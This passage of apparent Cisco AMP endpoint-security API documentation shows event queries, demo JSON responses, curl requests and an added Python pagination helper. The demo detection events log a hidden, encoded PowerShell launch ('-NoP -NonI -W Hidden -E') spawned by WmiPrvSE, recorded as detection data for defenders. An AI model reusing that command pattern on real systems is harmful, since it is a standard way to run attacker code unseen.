          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/2c846819-d267-4b76-9225-3709b97e3f78/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "bp_data": {
        "audit": false,
        "details": {
          "actions": [],
          "eng_epoch": 1,
          "eng_ver": "0.9.0.104",
          "matched_activity": {
            "events": [
              {
                "process:start": {
                  "app": "powershell.exe",
                  "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
                  "args": [
                    "powershell.exe",
                    "-NoP"
                  ],
                  "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E ...",
                  "parent_app": "WmiPrvSE.exe",
                  "parent_app_path": "C:\\Windows\\System32\\wbem",
                  "parent_pid": 2236,
                  "parent_puid": 132461352663910600,
                  "parent_user": "SYSTEM",
                  "parent_user_sid": "010100000000000512000000",
                  "pid": 10724,
                  "puid": 132465072105597400,
                  "ts": 1602033881727175700,
                  "user": "SYSTEM",
                  "user_sid": "010100000000000512000000"
                }
              }
            ],
            "limited": false,
            "matched": 1
          },
          "schema": "endpoint",
          "schema_epoch": 2,
          "sig_id": 20200719101800,
          "sig_rev": 1
        },
        "detection": "apde:20200719101800",
        "end_ts": 1620188084,
        "engine": "apde",
        "id": "cF3A8bacac",
        "name": "PowerShell Download String",
        "observables": {
          "file": [
            {
              "md5": "d683c112190f4b4c6d477d693ee88e35",
              "name": "WmiPrvSE.exe",
              "path": "C:\\Windows\\System32\\wbem",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
              "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
              "size": 425984,
              "type_id": 1
            },
            {
              "md5": "a575a7610e5f003cc36df39e07c4ba7d",
              "name": "powershell.exe",
              "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
              "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
              "size": 443392,
              "type_id": 1
            }
          ]
        },
        "remediated": false,
        "severity": "medium",
        "silent": true,
        "start_ts": 1620188084,
        "tactics": [
          "TA0002",
          "TA0005"
        ],
        "techniques": [
          "T1059"
        ],
        "type": "activity",
        "normalized": {
          "observables": {
            "file": {
              "name": [
                "wmiprvse.exe",
                "powershell.exe"
              ],
              "path": [
                "c:\\windows\\system32\\wbem",
                "c:\\windows\\system32\\windowspowershell\\v1.0"
              ]
            }
          },
          "name": "powershell download string"
        },
        "demo": true
      },
      "tactics": [
        "TA0002",
        "TA0005"
      ],
      "techniques": [
        "T1059"
      ]
    },
    {
      "id": 6880683125978957000,
      "timestamp": 1620188084,
      "timestamp_nanoseconds": 791000000,
      "date": "2021-05-05T04:14:44+00:00",
      "event_type": "Threat Detection",
      "event_type_id": 553648222,
      "detection": "PowerShell Download String",
      "connector_guid": "2c846819-d267-4b76-9225-3709b97e3f78",
      "group_guids": [
        "3aef61ae-a41f-4a89-a47d-1ce96164eea8"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "2c846819-d267-4b76-9225-3709b97e3f78",
        "hostname": "Demo_BP_WMIPRVSE",
        "external_ip": "145.238.35.100",
        "active": true,
        "network_addresses": [
          {
            "ip": "166.65.137.252",
            "mac": "8a:26:b5:30:1f:04"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/2c846819-d267-4b76-9225-3709b97e3f78",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/2c846819-d267-4b76-9225-3709b97e3f78/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "bp_data": {
        "audit": false,
        "details": {
          "actions": [

          ],
          "eng_epoch": 1,
          "eng_ver": "0.9.0.104",
          "matched_activity": {
            "events": [
              {
                "process:start": {
                  "app": "powershell.exe",
                  "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
                  "args": [
                    "powershell.exe",
                    "-NoP"
                  ],
                  "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E 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",
                  "parent_app": "WmiPrvSE.exe",
                  "parent_app_path": "C:\\Windows\\System32\\wbem",
                  "parent_pid": 2236,
                  "parent_puid": 132461352663910600,
                  "parent_user": "SYSTEM",
                  "parent_user_sid": "010100000000000512000000",
                  "pid": 10724,
                  "puid": 132465072105597400,
                  "ts": 1602033881727175700,
                  "user": "SYSTEM",
                  "user_sid": "010100000000000512000000"
                }
              }
            ],
            "limited": false,
            "matched": 1
          },
          "schema": "endpoint",
          "schema_epoch": 2,
          "sig_id": 20200719101800,
          "sig_rev": 1
        },
        "detection": "apde:20200719101800",
        "end_ts": 1620188084,
        "engine": "apde",
        "id": "cF3A8bacac",
        "name": "PowerShell Download String",
        "observables": {
          "file": [
            {
              "md5": "d683c112190f4b4c6d477d693ee88e35",
              "name": "WmiPrvSE.exe",
              "path": "C:\\Windows\\System32\\wbem",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
              "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
              "size": 425984,
              "type_id": 1
            },
            {
              "md5": "a575a7610e5f003cc36df39e07c4ba7d",
              "name": "powershell.exe",
              "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
              "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
              "size": 443392,
              "type_id": 1
            }
          ]
        },
        "remediated": false,
        "severity": "medium",
        "silent": true,
        "start_ts": 1620188084,
        "tactics": [
          "TA0002",
          "TA0005"
        ],
        "techniques": [
          "T1059"
        ],
        "type": "activity",
        "normalized": {
          "observables": {
            "file": {
              "name": [
                "wmiprvse.exe",
                "powershell.exe"
              ],
              "path": [
                "c:\\windows\\system32\\wbem",
                "c:\\windows\\system32\\windowspowershell\\v1.0"
              ]
            }
          },
          "name": "powershell download string"
        },
        "demo": true
      },
      "tactics": [
        "TA0002",
        "TA0005"
      ],
      "techniques": [
        "T1059"
      ]
    }
  ]
}

Fetch events that are newer than a given timestamp

Request

Requires Authorization
GET /v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL (edit, then copy and paste into your terminal)

# Basic auth: the API Client ID is the username and the API key is the password.
# The original snippet sent two conflicting Accept-Encoding headers ("identity" and
# "gzip, deflate" via --compressed); this matches the request headers listed above.
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
-u 'YOUR_API_CLIENT_ID:YOUR_API_KEY' \
'https://api.eu.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2824
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"4a49568d9b3418374f638238a03fb03c"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10",
      "prev": "https://api.eu.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=0",
      "next": "https://api.eu.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=20"
    },
    "results": {
      "total": 975,
      "current_item_count": 10,
      "index": 10,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 6533671385032557000,
      "timestamp": 1620253659,
      "timestamp_nanoseconds": 25000000,
      "date": "2021-05-05T22:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671385032556606",
      "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "21.207.234.38",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "238.85.81.101",
            "mac": "9e:47:ce:f6:82:2c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "\\\\?\\C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      }
    },
    {
      "id": 6533671385032557000,
      "timestamp": 1620253659,
      "timestamp_nanoseconds": 14000000,
      "date": "2021-05-05T22:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589309",
      "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "21.207.234.38",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "238.85.81.101",
            "mac": "9e:47:ce:f6:82:2c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      }
    }
  ]
}
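Walking the result set is where most client bugs live: the page above returns 10 of 975 matching events and tells you where you are only through metadata.links.next/prev and metadata.results.index. Two details worth checking in code. First, the event ids are 64-bit integers; the sample responses render them with trailing zeros (6533671385032557000) while the string detection_id keeps every digit, which is consistent with the examples having passed through a double-precision JSON renderer. Parse with a library that keeps integers exact and key on detection_id where one is present. Second, the x-ratelimit-* headers are per response, so a paging loop should read them on every page. The following is an added example, not the page's or Cisco's own client code: it follows next links, cross-checks each page's index and current_item_count against the link that fetched it, refuses to loop on a repeated link, and backs off when x-ratelimit-remaining reaches zero. The transport is a constructed offline stand-in (fake_get, SAMPLE_EVENTS) that mimics the link and metadata shapes shown above; the meaning of x-ratelimit-reset as seconds until reset is an assumption.

```python
import json
import time
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Query the page's example starts from; the fake transport below keys on the
# offset in this query string rather than on the exact link text.
FIRST_PAGE = ("https://api.eu.amp.cisco.com/v0/events"
              "?start_date=2015-10-01T00%3A00%3A00%2B00%3A00")


def seconds_until_reset(headers):
    """Seconds until the rate-limit window resets, 0 if the headers do not say.

    Assumption: x-ratelimit-reset counts seconds until x-ratelimit-resetdate.
    """
    reset = headers.get("x-ratelimit-reset")
    if reset is not None:
        return max(0, int(reset))
    reset_date = headers.get("x-ratelimit-resetdate")
    if reset_date:
        when = datetime.fromisoformat(reset_date.replace("Z", "+00:00"))
        return max(0, int((when - datetime.now(timezone.utc)).total_seconds()))
    return 0


def requested_offset(url):
    """The offset a link asks for; the first page may carry none."""
    return int(parse_qs(urlsplit(url).query).get("offset", ["0"])[0])


def iter_events(get, url, *, sleep=time.sleep):
    """Yield every event reachable from url by following metadata.links.next.

    get(url) returns (status, headers, body_text). Each page's metadata is
    checked against the link that fetched it, and a repeated link aborts the
    walk instead of spinning forever.
    """
    seen = set()
    while url:
        if url in seen:
            raise RuntimeError(f"pagination loop at {url}")
        seen.add(url)
        status, headers, body = get(url)
        if status != 200:
            raise RuntimeError(f"HTTP {status} for {url}")
        # json.loads keeps 64-bit ids exact; a parser that stores numbers as
        # doubles would round them, because the ids are larger than 2**53.
        page = json.loads(body)
        results = page["metadata"]["results"]
        data = page["data"]
        if results["current_item_count"] != len(data):
            raise RuntimeError("current_item_count disagrees with len(data)")
        if results["index"] != requested_offset(url):
            raise RuntimeError(f"server index {results['index']} != "
                               f"requested offset {requested_offset(url)}")
        yield from data
        url = page["metadata"]["links"].get("next")
        # Each page costs one request against x-ratelimit-limit; pause only
        # when the window is used up.
        if url and int(headers.get("x-ratelimit-remaining", "1")) <= 0:
            sleep(seconds_until_reset(headers) + 1)


def collect_events(get, url, *, sleep=time.sleep):
    return list(iter_events(get, url, sleep=sleep))


# --- constructed offline stand-in for the API -------------------------------
# Five events whose ids are deliberately above 2**53, served two per page with
# the same link and metadata shapes as the page's sample response.
SAMPLE_EVENTS = [
    {"id": 6533671385032556606 + i,
     "detection_id": str(6533671385032556606 + i),
     "event_type_id": 1090519054,
     "event_type": "Threat Detected",
     "date": "2021-05-05T22:27:39+00:00"}
    for i in range(5)
]


def fake_get(url):
    qs = parse_qs(urlsplit(url).query)
    offset = int(qs.get("offset", ["0"])[0])
    limit = int(qs.get("limit", ["10"])[0])
    total = len(SAMPLE_EVENTS)
    chunk = SAMPLE_EVENTS[offset:offset + limit]
    links = {"self": url}
    if offset > 0:
        links["prev"] = f"{FIRST_PAGE}&limit={limit}&offset={max(0, offset - limit)}"
    if offset + limit < total:
        links["next"] = f"{FIRST_PAGE}&limit={limit}&offset={offset + limit}"
    body = {
        "version": "v0.2.2",
        "metadata": {"links": links,
                     "results": {"total": total, "current_item_count": len(chunk),
                                 "index": offset, "items_per_page": limit}},
        "data": chunk,
    }
    headers = {"x-ratelimit-limit": "3000", "x-ratelimit-remaining": "2824",
               "x-ratelimit-reset": "1971"}
    return 200, headers, json.dumps(body)


if __name__ == "__main__":
    for event in collect_events(fake_get, f"{FIRST_PAGE}&offset=0&limit=2"):
        print(event["id"], event["detection_id"])
```

To run it against the live API, replace fake_get with a function that performs the authenticated GET and returns (status code, lowercased headers, body text); nothing else changes. The loop deliberately stops when next is absent rather than when the collected count reaches total, because new events can land while you page.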

Fetch list of events filtered by SCAN_STARTED event type

Request

Requires Authorization
GET /v0/events?event_type%5B%5D=554696714&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL (edit, then copy and paste into your terminal)

# Basic auth: the API Client ID is the username and the API key is the password.
# The original snippet sent two conflicting Accept-Encoding headers ("identity" and
# "gzip, deflate" via --compressed); this matches the request headers listed above.
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
-u 'YOUR_API_CLIENT_ID:YOUR_API_KEY' \
'https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2823
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"f070de09c8399ea38ef0184b2b6ae00e"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10"
    },
    "results": {
      "total": 9,
      "current_item_count": 9,
      "index": 0,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 5832364858376454000,
      "timestamp": 1620252424,
      "timestamp_nanoseconds": 772000000,
      "date": "2021-05-05T22:07:04+00:00",
      "event_type": "Scan Started",
      "event_type_id": 554696714,
      "connector_guid": "8f65c48e-e166-485e-9f0b-67460b99fa50",
      "group_guids": [
        "af1e7d79-880b-4aaf-84d4-06149fef0cd2",
        "8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
      ],
      "computer": {
        "connector_guid": "8f65c48e-e166-485e-9f0b-67460b99fa50",
        "hostname": "Demo_ZAccess",
        "external_ip": "129.92.41.205",
        "active": true,
        "network_addresses": [
          {
            "ip": "159.125.227.38",
            "mac": "bf:bc:e4:c9:d7:f1"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/8f65c48e-e166-485e-9f0b-67460b99fa50",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/8f65c48e-e166-485e-9f0b-67460b99fa50/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "scan": {
        "description": "C:\\Program Files\\DVD Maker"
      }
    },
    {
      "id": 5832364789656977000,
      "timestamp": 1620252408,
      "timestamp_nanoseconds": 193000000,
      "date": "2021-05-05T22:06:48+00:00",
      "event_type": "Scan Started",
      "event_type_id": 554696714,
      "connector_guid": "8f65c48e-e166-485e-9f0b-67460b99fa50",
      "group_guids": [
        "af1e7d79-880b-4aaf-84d4-06149fef0cd2",
        "8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
      ],
      "computer": {
        "connector_guid": "8f65c48e-e166-485e-9f0b-67460b99fa50",
        "hostname": "Demo_ZAccess",
        "external_ip": "129.92.41.205",
        "active": true,
        "network_addresses": [
          {
            "ip": "159.125.227.38",
            "mac": "bf:bc:e4:c9:d7:f1"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/8f65c48e-e166-485e-9f0b-67460b99fa50",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/8f65c48e-e166-485e-9f0b-67460b99fa50/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "scan": {
        "description": "C:\\Program Files\\Microsoft Games"
      }
    }
  ]
}